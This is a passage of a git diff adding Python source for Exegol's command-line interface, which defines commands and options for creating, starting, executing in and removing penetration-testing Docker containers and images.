"""This method replaces the parsing objects (Option) with the result of the parsing""" + for arg in vars(args).keys(): + # Check if the argument exist in the current class + if arg in self.__dict__: + # If so, overwrite it with the corresponding value after parsing + self.__setattr__(arg, vars(args)[arg]) + + def check_parameters(self) -> List[str]: + """This method identifies the missing required parameters""" + missingOption = [] + for groupArg in self.groupArgs: + for option in groupArg.options: + if option["required"]: + if self.__dict__[option["arg"].dest] is None: + missingOption.append(option["arg"].dest) + return missingOption + + def formatEpilog(self) -> str: + epilog = "[blue]Examples:[/blue]" + os.linesep + epilog += self._pre_usages + os.linesep + keys_len = {} + # Replace [.*] rich tag for line length count + for k in self._usages.keys(): + keys_len[k] = len(re.sub(r"\[/?[^]]+]", '', k, 0, re.MULTILINE)) + max_key = max(keys_len.values()) + for k, v in self._usages.items(): + space = ' ' * (max_key - keys_len.get(k, 0) + 2) + epilog += f" {k}:{space}[i]{v}[/i]{os.linesep}" + epilog += self._post_usages + os.linesep + return epilog diff --git a/exegol/console/cli/actions/ExegolParameters.py b/exegol/console/cli/actions/ExegolParameters.py new file mode 100644 index 00000000..53225e51 --- /dev/null +++ b/exegol/console/cli/actions/ExegolParameters.py @@ -0,0 +1,267 @@ +from exegol.console.cli.actions.Command import Command +from exegol.console.cli.actions.GenericParameters import * +from exegol.manager.ExegolManager import ExegolManager +from exegol.manager.UpdateManager import UpdateManager +from exegol.utils.ExeLog import logger + + +class Start(Command, ContainerCreation, ContainerStart): + """Automatically create, start / resume and enter an Exegol container""" + + def __init__(self): + Command.__init__(self) + ContainerCreation.__init__(self, self.groupArgs) + ContainerStart.__init__(self, self.groupArgs) + + self._usages = { + "Start interactively a container": "exegol start", + "Create a [blue]demo[/blue] container using [bright_blue]full[/bright_blue] image": "exegol start [blue]demo[/blue] [bright_blue]full[/bright_blue]", + "Spawn a shell from [blue]demo[/blue] container": "exegol start [blue]demo[/blue]", + "Create a container [blue]test[/blue] with a custom shared workspace": "exegol start [blue]test[/blue] [bright_blue]full[/bright_blue] -w [magenta]./project/pentest/[/magenta]", + "Create a container [blue]test[/blue] sharing the current working directory": "exegol start [blue]test[/blue] [bright_blue]full[/bright_blue] -cwd", + "Create a container [blue]htb[/blue] with a VPN": "exegol start [blue]htb[/blue] [bright_blue]full[/bright_blue] --vpn [magenta]~/vpn/[/magenta][bright_magenta]lab_Dramelac.ovpn[/bright_magenta]", + "Create a container [blue]app[/blue] with custom volume": "exegol start [blue]app[/blue] [bright_blue]full[/bright_blue] -V [bright_magenta]'/var/app/:/app/'[/bright_magenta]", + "Get a [blue]tmux[/blue] shell": "exegol start --shell [blue]tmux[/blue]", + "Use a Proxmark": "exegol start -d /dev/ttyACM0", + "Use an HackRF One": "exegol start -d /dev/bus/usb/", + } + + # Create container start / exec arguments + self.shell = Option("-s", "--shell", + dest="shell", + action="store", + choices={"zsh", "bash", "tmux"}, + default="zsh", + help="Select a shell environment to launch at startup (Default: [blue]zsh[/blue])") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.shell, "required": False}, + title="[bold cyan]Start[/bold cyan] [blue]specific options[/blue]")) + + def __call__(self, *args, **kwargs): + return ExegolManager.start + + +class Stop(Command, ContainerMultiSelector): + """Stop an Exegol container""" + + def __init__(self): + Command.__init__(self) + ContainerMultiSelector.__init__(self, self.groupArgs) + + self._usages = { + "Stop interactively one or multiple container": "exegol stop", + "Stop [blue]demo[/blue]": "exegol stop [blue]demo[/blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running stop module") + return ExegolManager.stop + + +class Install(Command, ImageSelector): + """Install or build Exegol image""" + + def __init__(self): + Command.__init__(self) + ImageSelector.__init__(self, self.groupArgs) + + self._usages = { + "Install or build interactively an exegol image": "exegol install", + "Install or update the [bright_blue]full[/bright_blue] image": "exegol install [bright_blue]full[/bright_blue]", + "Build [bright_blue]local[/bright_blue] image": "exegol install [bright_blue]local[/bright_blue]" + } + + # Create container build arguments + self.build_profile = Option("build_profile", + metavar="BUILD_PROFILE", + choices=UpdateManager.listBuildProfiles().keys(), + nargs="?", + action="store", + help="Select the build profile used to create a local image.") + self.build_log = Option("--build-log", + dest="build_log", + metavar="LOGFILE_PATH", + action="store", + help="Write image building logs to a file.") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.build_profile, "required": False}, + {"arg": self.build_log, "required": False}, + title="[bold cyan]Build[/bold cyan] [blue]specific options[/blue]")) + + def __call__(self, *args, **kwargs): + logger.debug("Running install module") + return ExegolManager.install + + +class Update(Command, ImageSelector): + """Update an Exegol image""" + + def __init__(self): + Command.__init__(self) + ImageSelector.__init__(self, self.groupArgs) + + self.skip_git = Option("--skip-git", + dest="skip_git", + action="store_true", + help="Skip git updates (wrapper, image sources and exegol resources).") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.skip_git, "required": False}, + title="[bold cyan]Update[/bold cyan] [blue]specific options[/blue]")) + + self._usages = { + "Install or update interactively an exegol image": "exegol update", + "Install or update the [bright_blue]full[/bright_blue] image": "exegol update [bright_blue]full[/bright_blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running update module") + return ExegolManager.update + + +class Uninstall(Command, ImageMultiSelector): + """Remove Exegol [default not bold]image(s)[/default not bold]""" + + def __init__(self): + Command.__init__(self) + ImageMultiSelector.__init__(self, self.groupArgs) + + self.force_mode = Option("-F", "--force", + dest="force_mode", + action="store_true", + help="Remove image without interactive user confirmation.") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.force_mode, "required": False}, + title="[bold cyan]Uninstall[/bold cyan] [blue]specific options[/blue]")) + + self._usages = { + "Uninstall interactively one or many exegol image": "exegol uninstall", + "Uninstall the [bright_blue]dev[/bright_blue] image": "exegol uninstall [bright_blue]dev[/bright_blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running uninstall module") + return ExegolManager.uninstall + + +class Remove(Command, ContainerMultiSelector): + """Remove Exegol [default not bold]container(s)[/default not bold]""" + + def __init__(self): + Command.__init__(self) + ContainerMultiSelector.__init__(self, self.groupArgs) + + self.force_mode = Option("-F", "--force", + dest="force_mode", + action="store_true", + help="Remove container without interactive user confirmation.") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.force_mode, "required": False}, + title="[bold cyan]Remove[/bold cyan] [blue]specific options[/blue]")) + + self._usages = { + "Remove interactively one or many containers": "exegol remove", + "Remove the [blue]demo[/blue] container": "exegol remove [blue]demo[/blue]" + } + + def __call__(self, *args, **kwargs): + logger.debug("Running remove module") + return ExegolManager.remove + + +class Exec(Command, ContainerCreation, ContainerStart): + """Execute a command on an Exegol container""" + + def __init__(self): + Command.__init__(self) + ContainerCreation.__init__(self, self.groupArgs) + ContainerStart.__init__(self, self.groupArgs) + + self._usages = { + "Execute the command [magenta]bloodhound[/magenta] in the container [blue]demo[/blue]": + "exegol exec [blue]demo[/blue] [magenta]bloodhound[/magenta]", + "Execute the command [magenta]'nmap -h'[/magenta] with console output": + "exegol exec -v [blue]demo[/blue] [magenta]'nmap -h'[/magenta]", + "Execute a command in background within the [blue]demo[/blue] container": + "exegol exec -b [blue]demo[/blue] [magenta]bloodhound[/magenta]", + "Execute the command [magenta]bloodhound[/magenta] in a temporary container based on the [bright_blue]full[/bright_blue] image": + "exegol exec --tmp [bright_blue]full[/bright_blue] [magenta]bloodhound[/magenta]", + "Execute a command in background with a temporary container": + "exegol exec -b --tmp [bright_blue]full[/bright_blue] [magenta]bloodhound[/magenta]", + } + + # Overwrite default selectors + for group in self.groupArgs.copy(): + # Find group containing default selector to remove them + for parameter in group.options: + if parameter.get('arg') == self.containertag or parameter.get('arg') == self.imagetag: + # Removing default GroupArg selector + self.groupArgs.remove(group) + break + # Removing default selector objects + self.containertag = None + self.imagetag = None + + self.selector = Option("selector", + metavar="CONTAINER or IMAGE", + nargs='?', + action="store", + help="Tag used to target an Exegol container (by default) or an image (if --tmp is set).") + + # Custom parameters + self.exec = Option("exec", + metavar="COMMAND", + nargs="+", + action="store", + help="Execute a single command in the exegol container.") + self.daemon = Option("-b", "--background", + action="store_true", + dest="daemon", + help="Executes the command in background as a daemon " + "(default: [red not italic]False[/red not italic])") + self.tmp = Option("--tmp", + action="store_true", + dest="tmp", + help="Created a dedicated and temporary container to execute the command " + "(default: [red not italic]False[/red not italic])") + + # Create group parameter for container selection + self.groupArgs.append(GroupArg({"arg": self.selector, "required": False}, + {"arg": self.exec, "required": False}, + {"arg": self.daemon, "required": False}, + {"arg": self.tmp, "required": False}, + title="[bold cyan]Exec[/bold cyan] [blue]specific options[/blue]")) + + def __call__(self, *args, **kwargs): + logger.debug("Running exec module") + return ExegolManager.exec + + +class Info(Command, ContainerSelector): + """Show info on containers and images (local & remote)""" + + def __init__(self): + Command.__init__(self) + ContainerSelector.__init__(self, self.groupArgs) + + self._usages = { + "Print containers and images essentials information": "exegol info", + "Print the detailed configuration of the [blue]demo[/blue] container": "exegol info [blue]demo[/blue]", + "Print verbose information": "exegol info [yellow3]-v[/yellow3]", + "Print advanced information": "exegol info [yellow3]-vv[/yellow3]", + "Print debug information": "exegol info [yellow3]-vvv[/yellow3]" + } + + def __call__(self, *args, **kwargs): + return ExegolManager.info + + +class Version(Command): + """Print current Exegol version""" + + def __call__(self, *args, **kwargs): + return ExegolManager.print_version diff --git a/exegol/console/cli/actions/GenericParameters.py b/exegol/console/cli/actions/GenericParameters.py new file mode 100644 index 00000000..5b115db3 --- /dev/null +++ b/exegol/console/cli/actions/GenericParameters.py @@ -0,0 +1,173 @@ +from typing import List + +from exegol.console.cli.actions.Command import Option, GroupArg +from exegol.utils.UserConfig import UserConfig + + +class ContainerSelector: + """Generic parameter class for container selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create container selector arguments + self.containertag = Option("containertag", + metavar="CONTAINER", + nargs='?', + action="store", + help="Tag used to target an Exegol container") + + # Create group parameter for container selection + groupArgs.append(GroupArg({"arg": self.containertag, "required": False}, + title="[blue]Container selection options[/blue]")) + + +class ContainerMultiSelector: + """Generic parameter class for container multi selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create container selector arguments + self.multicontainertag = Option("multicontainertag", + metavar="CONTAINER", + nargs='*', + action="store", + help="Tag used to target one or multiple Exegol container") + + # Create group parameter for container multi selection + groupArgs.append(GroupArg({"arg": self.multicontainertag, "required": False}, + title="[blue]Containers selection options[/blue]")) + + +class ContainerStart: + """Generic parameter class for container selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create options on container start + self.envs = Option("-e", "--env", + action="append", + default=[], + dest="envs", + help="And an environment variable on Exegol (format: --env KEY=value). The variables " + "configured during the creation of the container will be persistent in all shells. " + "If the container already exists, the variable will be present only in the current shell") + + # Create group parameter for container options at start + groupArgs.append(GroupArg({"arg": self.envs, "required": False}, + title="[blue]Container start options[/blue]")) + + +class ImageSelector: + """Generic parameter class for image selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create image selector arguments + self.imagetag = Option("imagetag", + metavar="IMAGE", + nargs='?', + action="store", + help="Tag used to target an Exegol image") + + # Create group parameter for image selection + groupArgs.append(GroupArg({"arg": self.imagetag, "required": False}, + title="[blue]Image selection options[/blue]")) + + +class ImageMultiSelector: + """Generic parameter class for image multi selection""" + + def __init__(self, groupArgs: List[GroupArg]): + # Create image multi selector arguments + self.multiimagetag = Option("multiimagetag", + metavar="IMAGE", + nargs='*', + action="store", + help="Tag used to target one or multiple Exegol image") + + # Create group parameter for image multi selection + groupArgs.append(GroupArg({"arg": self.multiimagetag, "required": False}, + title="[blue]Images selection options[/blue]")) + + +class ContainerCreation(ContainerSelector, ImageSelector): + """Generic parameter class for container creation""" + + def __init__(self, groupArgs: List[GroupArg]): + # Init parents : ContainerStart > ContainerSelector + ContainerSelector.__init__(self, groupArgs) + ImageSelector.__init__(self, groupArgs) + + self.X11 = Option("--disable-X11", + action="store_false", + default=True, + dest="X11", + help="Disable display sharing to run GUI-based applications (default: [green]Enabled[/green])") + self.shared_resources = Option("--disable-my-resources", + action="store_false", + default=True, + dest="shared_resources", + help=f"Disable the mount of the shared resources (/my-resources) from the host ({UserConfig().shared_resources_path}) (default: [green]Enabled[/green])") + self.exegol_resources = Option("--disable-exegol-resources", + action="store_false", + default=True, + dest="exegol_resources", + help=f"Disable the mount of the exegol resources (/opt/resources) from the host ({UserConfig().exegol_resources_path}) (default: [green]Enabled[/green])") + self.host_network = Option("--disable-shared-network", + action="store_false", + default=True, + dest="host_network", + help="Disable the sharing of the host's network interfaces with exegol (default: [green]Enabled[/green])") + self.share_timezone = Option("--disable-shared-timezones", + action="store_false", + default=True, + dest="share_timezone", + help="Disable the sharing of the host's time and timezone configuration with exegol (default: [green]Enabled[/green])") + self.mount_current_dir = Option("-cwd", "--cwd-mount", + dest="mount_current_dir", + action="store_true", + default=False, + help="This option is a shortcut to set the /workspace folder to the user's current working directory") + self.workspace_path = Option("-w", "--workspace", + dest="workspace_path", + action="store", + help="The specified host folder will be linked to the /workspace folder in the container") + self.volumes = Option("-V", "--volume", + action="append", + default=[], + dest="volumes", + help="Share a new volume between host and exegol (format: --volume /host/path/:/exegol/mount/)") + self.privileged = Option("--privileged", + dest="privileged", + action="store_true", + default=False, + help="[orange3](dangerous)[/orange3] give extended privileges at the container creation (e.g. needed to " + "mount things, to use wifi or bluetooth)") + self.devices = Option("-d", "--device", + dest="devices", + default=[], + action="append", + help="Add host [default not bold]device(s)[/default not bold] at the container creation (example: -d /dev/ttyACM0 -d /dev/bus/usb/)") + + self.vpn = Option("--vpn", + dest="vpn", + default=None, + action="store", + help="Setup an OpenVPN connection at the container creation (example: --vpn /home/user/vpn/conf.ovpn)") + self.vpn_auth = Option("--vpn-auth", + dest="vpn_auth", + default=None, + action="store", + help="Enter the credentials with a file (first line: username, second line: password) to establish the VPN connection automatically (example: --vpn-auth /home/user/vpn/auth.txt)") + + groupArgs.append(GroupArg({"arg": self.workspace_path, "required": False}, + {"arg": self.mount_current_dir, "required": False}, + {"arg": self.volumes, "required": False}, + {"arg": self.privileged, "required": False}, + {"arg": self.devices, "required": False}, + {"arg": self.X11, "required": False}, + {"arg": self.shared_resources, "required": False}, + {"arg": self.exegol_resources, "required": False}, + {"arg": self.host_network, "required": False}, + {"arg": self.share_timezone, "required": False}, + title="[blue]Container creation options[/blue]")) + + groupArgs.append(GroupArg({"arg": self.vpn, "required": False}, + {"arg": self.vpn_auth, "required": False}, + title="[blue]Container creation VPN options[/blue]")) diff --git a/exegol/console/cli/actions/__init__.py b/exegol/console/cli/actions/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/exceptions/ExegolExceptions.py b/exegol/exceptions/ExegolExceptions.py new file mode 100644 index 00000000..b75aad3d --- /dev/null +++ b/exegol/exceptions/ExegolExceptions.py @@ -0,0 +1,14 @@ +# Exceptions specific to the successful operation of exegol +class ObjectNotFound(Exception): + """Custom exception when a specific container do not exist""" + pass + + +class ProtocolNotSupported(Exception): + """Custom exception when a specific network protocol is not supported""" + pass + + +class CancelOperation(Exception): + """Custom exception when an error occurred and the operation must be canceled ou skipped""" + pass diff --git a/exegol/exceptions/__init__.py b/exegol/exceptions/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/exegol/manager/ExegolController.py b/exegol/manager/ExegolController.py new file mode 100644 index 00000000..9101e7a7 --- /dev/null +++ b/exegol/manager/ExegolController.py @@ -0,0 +1,40 @@ +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.console.cli.actions.ExegolParameters import Command +from exegol.utils.ExeLog import logger, ExeLog, console + + +class ExegolController: + """Main controller of exegol""" + + # Get action selected by user + # (ParametersManager must be loaded from ExegolController first to load every Command subclass) + __action: Command = ParametersManager().getCurrentAction() + + @classmethod + def call_action(cls): + """Dynamically retrieve the main function corresponding to the action selected by the user + and execute it on the main thread""" + # Check for missing parameters + missing_params = cls.__action.check_parameters() + if len(missing_params) == 0: + # Fetch main operation function + main_action = cls.__action() + # Execute main function + main_action() + else: + # TODO review required parameters + logger.error(f"These parameters are mandatory but missing: {','.join(missing_params)}") + + +def main(): + """Exegol main console entrypoint""" + try: + # Set logger verbosity depending on user input + ExeLog.setVerbosity(ParametersManager().verbosity, ParametersManager().quiet) + # Start Main controller & Executing action selected by user CLI + ExegolController.call_action() + except KeyboardInterrupt: + logger.empty_line() + logger.info("Exiting") + except Exception: + console.print_exception(show_locals=True) diff --git a/exegol/manager/ExegolManager.py b/exegol/manager/ExegolManager.py new file mode 100644 index 00000000..4b9be575 --- /dev/null +++ b/exegol/manager/ExegolManager.py @@ -0,0 +1,493 @@ +import binascii +import logging +import os +from typing import Union, List, Tuple, Optional, cast, Sequence + +from exegol.console.ConsoleFormat import boolFormatter +from exegol.console.ExegolPrompt import Confirm +from exegol.console.TUI import ExegolTUI +from exegol.console.cli.ParametersManager import ParametersManager +from exegol.console.cli.actions.GenericParameters import ContainerCreation +from exegol.exceptions.ExegolExceptions import ObjectNotFound, CancelOperation +from exegol.manager.UpdateManager import UpdateManager +from exegol.model.ContainerConfig import ContainerConfig +from exegol.model.ExegolContainer import ExegolContainer +from exegol.model.ExegolContainerTemplate import ExegolContainerTemplate +from exegol.model.ExegolImage import ExegolImage +from exegol.model.ExegolModules import ExegolModules +from exegol.model.SelectableInterface import SelectableInterface +from exegol.utils.ConstantConfig import ConstantConfig +from exegol.utils.DockerUtils import DockerUtils +from exegol.utils.EnvInfo import EnvInfo +from exegol.utils.ExeLog import logger, ExeLog +from exegol.utils.UserConfig import UserConfig + + +class ExegolManager: + """Contains the main procedures of all actions available in Exegol""" + + # Cache data + __container: Union[Optional[ExegolContainer], List[ExegolContainer]] = None + __image: Union[Optional[ExegolImage], List[ExegolImage]] = None + + # Runtime default configuration + __interactive_mode = False + + @classmethod + def info(cls): + """Print a list of available images and containers on the current host""" + ExegolManager.print_version() + if logger.isEnabledFor(ExeLog.VERBOSE): + logger.verbose("Listing user configurations") + ExegolTUI.printTable(UserConfig().get_configs(), title="[not italic]:brain: [/not italic][gold3][g]User configurations[/g][/gold3]") + if logger.isEnabledFor(ExeLog.ADVANCED): + logger.verbose("Listing git repositories") + ExegolTUI.printTable(UpdateManager.listGitStatus(), title="[not italic]:octopus: [/not italic][gold3][g]Project modules[/g][/gold3]") + if bool(ParametersManager().containertag): + # If the user have supplied a container name, show container config + container = cls.__loadOrCreateContainer(ParametersManager().containertag, must_exist=True) + if container is not None: + ExegolTUI.printContainerRecap(container) + else: + # Without any parameter, show all images and containers info + # Fetch data + images = DockerUtils.listImages(include_version_tag=False) + containers = DockerUtils.listContainers() + # List and print images + logger.verbose("Listing local and remote Exegol images") + ExegolTUI.printTable(images) + # List and print containers + logger.verbose("Listing local Exegol containers") + logger.raw(f"[bold blue][*][/bold blue] Number of Exegol containers: {len(containers)}{os.linesep}", + markup=True) + ExegolTUI.printTable(containers) + + @classmethod + def start(cls): + """Create and/or start an exegol container to finally spawn an interactive shell""" + logger.info("Starting exegol") + # TODO add console logging capabilities + # Check if the first positional parameter have been supplied + cls.__interactive_mode = not bool(ParametersManager().containertag) + if not cls.__interactive_mode: + logger.info("Arguments supplied with the command, skipping interactive mode") + container = cls.__loadOrCreateContainer() + if not container.isNew(): + # Check and warn user if some parameters don't apply to the current session + cls.__checkUselessParameters() + container.start() + container.spawnShell() + + @classmethod + def exec(cls): + """Create and/or start an exegol container to execute a specific command. + The execution can be seen in console output or be relayed in the background as a daemon.""" + logger.info("Starting exegol") + if ParametersManager().tmp: + container = cls.__createTmpContainer(ParametersManager().selector) + if not ParametersManager().daemon: + container.exec(command=ParametersManager().exec, as_daemon=False) + container.stop(timeout=2) + else: + logger.success(f"Command executed as entrypoint of the container {container.hostname}") + else: + container = cls.__loadOrCreateContainer(override_container=ParametersManager().selector) + container.exec(command=ParametersManager().exec, as_daemon=ParametersManager().daemon) + + @classmethod + def stop(cls): + """Stop an exegol container""" + logger.info("Stopping exegol") + container = cls.__loadOrCreateContainer(multiple=True, must_exist=True) + for c in container: + c.stop(timeout=2) + + @classmethod + def install(cls): + """Pull or build a docker exegol image""" + try: + if not ExegolModules().isExegolResourcesReady(): + raise CancelOperation + except CancelOperation: + # Error during installation, skipping operation + logger.warning("Exegol resources have not been downloaded, the feature cannot be enabled") + UpdateManager.updateImage(install_mode=True) + + @classmethod + def update(cls): + """Update python wrapper (git installation required) and Pull a docker exegol image""" + if not ParametersManager().skip_git: + UpdateManager.updateWrapper() + UpdateManager.updateImageSource() + UpdateManager.updateResources() + UpdateManager.updateImage() + + @classmethod + def uninstall(cls): + """Remove an exegol image""" + logger.info("Uninstalling an exegol image") + # Set log level to verbose in order to show every image installed including the outdated. + if not logger.isEnabledFor(ExeLog.VERBOSE): + logger.setLevel(ExeLog.VERBOSE) + images = cls.__loadOrInstallImage(multiple=True, must_exist=True) + if len(images) == 0: + logger.error("No images were selected. Exiting.") + return + all_name = ", ".join([x.getName() for x in images]) + if not ParametersManager().force_mode and not Confirm( + f"Are you sure you want to [red]permanently remove[/red] the following images? [orange3][ {all_name} ][/orange3]", + default=False): + logger.error("Aborting operation.") + return + for img in images: + DockerUtils.removeImage(img) + + @classmethod + def remove(cls): + """Remove an exegol container""" + logger.info("Removing an exegol container") + containers = cls.__loadOrCreateContainer(multiple=True, must_exist=True) + if len(containers) == 0: + logger.error("No containers were selected. Exiting.") + return + all_name = ", ".join([x.name for x in containers]) + if not ParametersManager().force_mode and not Confirm( + f"Are you sure you want to [red]permanently remove[/red] the following containers? [orange3][ {all_name} ][/orange3]", + default=False): + logger.error("Aborting operation.") + return + for c in containers: + c.remove() + # If the image used is deprecated, it must be deleted after the removal of its container + if c.image.isLocked(): + DockerUtils.removeImage(c.image, upgrade_mode=True) + + @classmethod + def print_version(cls): + """Show exegol version (and context configuration on debug mode)""" + logger.raw(f"[bold blue][*][/bold blue] Exegol is currently in version v{ConstantConfig.version}{os.linesep}", + level=logging.INFO, markup=True) + logger.debug(f"Pip installation: {boolFormatter(ConstantConfig.pip_installed)}") + logger.debug(f"Git source installation: {boolFormatter(ConstantConfig.git_source_installation)}") + logger.debug(f"Host OS: {EnvInfo.getHostOs()}") + if EnvInfo.isWindowsHost(): + logger.debug(f"Python environment: {EnvInfo.current_platform}") + logger.debug(f"Docker engine: {EnvInfo.getDockerEngine().upper()}") + logger.debug(f"Windows release: {EnvInfo.getWindowsRelease()}") + + @classmethod + def __loadOrInstallImage(cls, + override_image: Optional[str] = None, + multiple: bool = False, + must_exist: bool = False) -> Union[Optional[ExegolImage], List[ExegolImage]]: + """Select / Load (and install) an ExegolImage + When must_exist is set to True, return None if no image are installed + When multiple is set to True, return a list of ExegolImage + Otherwise, always return an ExegolImage""" + if cls.__image is not None: + # Return cache + return cls.__image + image_tag = override_image if override_image is not None else ParametersManager().imagetag + image_tags = ParametersManager().multiimagetag + image_selection: Union[Optional[ExegolImage], List[ExegolImage]] = None + # While an image have not been selected + while image_selection is None: + try: + if image_tag is None and (image_tags is None or len(image_tags) == 0): + # Interactive (TUI) image selection + image_selection = cast(Union[Optional[ExegolImage], List[ExegolImage]], + cls.__interactiveSelection(ExegolImage, multiple, must_exist)) + else: + # Select image by tag name (non-interactive) + if multiple: + image_selection = [] + for image_tag in image_tags: + image_selection.append(DockerUtils.getInstalledImage(image_tag)) + else: + image_selection = DockerUtils.getInstalledImage(image_tag) + except ObjectNotFound: + # ObjectNotFound is raised when the image_tag provided by the user does not match any existing image. + if image_tag is not None: + logger.warning(f"The image named '{image_tag}' has not been found.") + # If the user's selected image have not been found, + # offer to build a local image with this name + # (only if must_exist is not set) + if not must_exist: + image_selection = UpdateManager.updateImage(image_tag) + # Allow the user to interactively select another installed image + image_tag = None + except IndexError: + # IndexError is raised when no image are available (not applicable when multiple is set, return an empty array) + # (raised from TUI interactive selection) + if must_exist: + # If there is no image installed, return none + logger.error("No images were found") + return [] if multiple else None + else: + # If the user's selected image have not been found, offer the choice to build a local image at this name + # (only if must_exist is not set) + image_selection = UpdateManager.updateImage(image_tag) + image_tag = None + # Checks if an image has been selected + if image_selection is None: + # If not, retry the selection + logger.error("No image has been selected.") + continue + + # Check if every image are installed + install_status, checked_images = cls.__checkImageInstallationStatus(image_selection, multiple, must_exist) + if not install_status: + # If one of the image is not install where it supposed to, restart the selection + # allowing him to interactively choose another image + image_selection, image_tag = None, None + continue + + cls.__image = cast(Union[Optional[ExegolImage], List[ExegolImage]], checked_images) + return cls.__image + + @classmethod + def __checkImageInstallationStatus(cls, + image_selection: Union[ExegolImage, List[ExegolImage]], + multiple: bool = False, + must_exist: bool = False + ) -> Tuple[bool, Optional[Union[ExegolImage, ExegolContainer, List[ExegolImage], List[ExegolContainer]]]]: + """Checks if the selected images are installed and ready for use. + returns false if the images are supposed to be already installed.""" + # Checks if one or more images have been selected and unifies the format into a list. + reverse_type = False + check_img: List[ExegolImage] + if type(image_selection) is ExegolImage: + check_img = [image_selection] + # Tag of the operation to reverse it before the return + reverse_type = True + elif type(image_selection) is list: + check_img = image_selection + else: + check_img = [] + + # Check if every image are installed + for i in range(len(check_img)): + if not check_img[i].isInstall(): + # Is must_exist is set, every image are supposed to be already installed + if must_exist: + logger.error(f"The selected image '{check_img[i].getName()}' is not installed.") + # If one of the image is not install, return False to restart the selection + return False, None + else: + # Check if the selected image is installed and install it + logger.warning("The selected image is not installed.") + # Download remote image + if DockerUtils.downloadImage(check_img[i], install_mode=True): + # Select installed image + check_img[i] = DockerUtils.getInstalledImage(check_img[i].getName()) + else: + logger.error("This image cannot be installed.") + return False, None + + if reverse_type and not multiple: + # Restoration of the original type + return True, check_img[0] + return True, check_img + + @classmethod + def __loadOrCreateContainer(cls, + override_container: Optional[str] = None, + multiple: bool = False, + must_exist: bool = False) -> Union[Optional[ExegolContainer], List[ExegolContainer]]: + """Select one or multipleExegolContainer + Or create a new ExegolContainer if no one already exist (and must_exist is not set) + When must_exist is set to True, return None if no container exist + When multiple is set to True, return a list of ExegolContainer""" + if cls.__container is not None: + # Return cache + return cls.__container + container_tag: Optional[str] = override_container if override_container is not None else ParametersManager().containertag + container_tags: Optional[Sequence[str]] = ParametersManager().multicontainertag + try: + if container_tag is None and (container_tags is None or len(container_tags) == 0): + # Interactive container selection + cls.__container = cast(Union[Optional[ExegolContainer], List[ExegolContainer]], + cls.__interactiveSelection(ExegolContainer, multiple, must_exist)) + else: + # Try to find the corresponding container + if multiple: + cls.__container = [] + assert container_tags is not None + # test each user tag + for container_tag in container_tags: + try: + cls.__container.append(DockerUtils.getContainer(container_tag)) + except ObjectNotFound: + # on multi select, an object not found is not critical + if must_exist: + # If the selected tag doesn't match any container, print an alert and continue + logger.warning(f"The container named '{container_tag}' has not been found") + else: + # If there is a multi select without must_exist flag, raise an error + # because multi container creation is not supported + raise NotImplemented + else: + assert container_tag is not None + cls.__container = DockerUtils.getContainer(container_tag) + except (ObjectNotFound, IndexError): + # ObjectNotFound is raised when the container_tag provided by the user does not match any existing container. + # IndexError is raise when no container exist (raised from TUI interactive selection) + # Create container + if must_exist: + logger.warning(f"The container named '{container_tag}' has not been found") + return [] if multiple else None + return cls.__createContainer(container_tag) + assert cls.__container is not None + return cast(Union[Optional[ExegolContainer], List[ExegolContainer]], cls.__container) + + @classmethod + def __interactiveSelection(cls, + object_type: type, + multiple: bool = False, + must_exist: bool = False) -> \ + Union[ExegolImage, ExegolContainer, Sequence[ExegolImage], Sequence[ExegolContainer]]: + """Interactive object selection process, depending on object_type. + object_type can be ExegolImage or ExegolContainer.""" + object_list: Sequence[SelectableInterface] + # Object listing depending on the type + if object_type is ExegolContainer: + # List all images available + object_list = DockerUtils.listContainers() + elif object_type is ExegolImage: + # List all images available + object_list = DockerUtils.listInstalledImages() if must_exist else DockerUtils.listImages() + else: + logger.critical("Unknown object type during interactive selection. Exiting.") + raise Exception + # Interactive choice with TUI + user_selection: Union[SelectableInterface, Sequence[SelectableInterface], str] + if multiple: + user_selection = ExegolTUI.multipleSelectFromTable(object_list, object_type=object_type) + else: + user_selection = ExegolTUI.selectFromTable(object_list, object_type=object_type, + allow_None=not must_exist) + # Check if the user has chosen an existing object + if type(user_selection) is str: + # Otherwise, create a new object with the supplied name + if object_type is ExegolContainer: + user_selection = cls.__createContainer(user_selection) + else: + # Calling buildAndLoad directly, no need to ask confirmation, already done by TUI. + user_selection = UpdateManager.buildAndLoad(user_selection) + return cast(Union[ExegolImage, ExegolContainer, List[ExegolImage], List[ExegolContainer]], user_selection) + + @classmethod + def __prepareContainerConfig(cls): + """Create Exegol configuration with user input""" + # Create default exegol config + config = ContainerConfig() + # Container configuration from user CLI options + if ParametersManager().X11: + config.enableGUI() + if ParametersManager().share_timezone: + config.enableSharedTimezone() + config.setNetworkMode(ParametersManager().host_network) + if ParametersManager().shared_resources: + config.enableSharedResources() + if ParametersManager().exegol_resources: + config.enableExegolResources() + if ParametersManager().workspace_path: + if ParametersManager().mount_current_dir: + logger.warning( + f'Workspace conflict detected (-cwd cannot be use with -w). Using: {ParametersManager().workspace_path}') + config.setWorkspaceShare(ParametersManager().workspace_path) + elif ParametersManager().mount_current_dir: + config.enableCwdShare() + if ParametersManager().privileged: + config.setPrivileged() + if ParametersManager().volumes is not None: + for volume in ParametersManager().volumes: + config.addRawVolume(volume) + if ParametersManager().devices is not None: + for device in ParametersManager().devices: + config.addDevice(device) + if ParametersManager().vpn is not None: + config.enableVPN() + if ParametersManager().envs is not None: + for env in ParametersManager().envs: + config.addRawEnv(env) + return config + + @classmethod + def __createContainer(cls, name: Optional[str]) -> ExegolContainer: + """Create an ExegolContainer""" + logger.verbose("Configuring new exegol container") + # Create exegol config + image: Optional[ExegolImage] = cast(ExegolImage, cls.__loadOrInstallImage()) + config = cls.__prepareContainerConfig() + assert image is not None # load or install return an image + model = 